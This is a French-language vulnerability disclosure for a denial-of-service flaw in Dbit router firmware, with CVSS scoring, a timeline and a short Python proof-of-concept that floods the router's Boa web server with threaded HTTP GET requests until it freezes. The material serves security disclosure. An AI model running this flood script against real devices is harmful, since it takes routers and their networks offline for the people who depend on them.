
Preuve de concept pour CVE-2026-36957, une vulnérabilité de déni de service dans le firmware du routeur Dbit via une inondation HTTP sur le serveur web Boa, provoquant l'épuisement des ressources et le blocage du système.
ID CVE : CVE-2026-36957 Date : 2026-04-29 Découvreur : Kirubel Solomne Fournisseur : Shenzhen Dibit Network Equipment Co., Ltd. Produit : Routeur Dbit Version du firmware : V1.0.0 CWE : CWE-400 - Consommation de ressources non contrôlée
Le firmware V1.0.0 du routeur Dbit est vulnérable à un déni de service via le gestionnaire d'URI du serveur web Boa. En envoyant un volume élevé de requêtes HTTP GET vers des URI inexistants, un attaquant peut épuiser les ressources système critiques, notamment les descripteurs de fichiers et les tampons mémoire. Cela entraîne un blocage du noyau ou un gel du système qui désactive le portail de gestion web et toutes les capacités de routage.
Score CVSS v3.1 : 7,5 (Élevé)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
| Métrique | Valeur |
|---|
| Vecteur d'attaque | Réseau |
| Complexité de l'attaque | Faible |
| Privilèges requis | Aucun |
| Interaction utilisateur | Aucune |
| Impact sur la confidentialité | Aucun |
| Impact sur l'intégrité | Aucun |
| Impact sur la disponibilité | Élevé |
import requests
import threading
TARGET = "http://192.168.10.1"
def flood(i):
try:
requests.get(f"{TARGET}/nonexistent_{i}", timeout=2)
except:
pass
threads = []
for i in range(1000):
t = threading.Thread(target=flood, args=(i,))
threads.append(t)
t.start()
for t in threads:
t.join()
print("Done. Check if router is still responsive.")
Comportement attendu : Le serveur doit limiter les connexions et rester stable. Comportement réel : L'interface web du routeur devient non réactive ; un redémarrage manuel est nécessaire.
| Date | Événement |
|---|---|
| 2026-04-29 | Vulnérabilité découverte |
| 2026-04-29 | Signalée à MITRE |
| 2026-04-29 | CVE-2026-36957 attribuée |
| 2026-04-29 | Divulgation publique |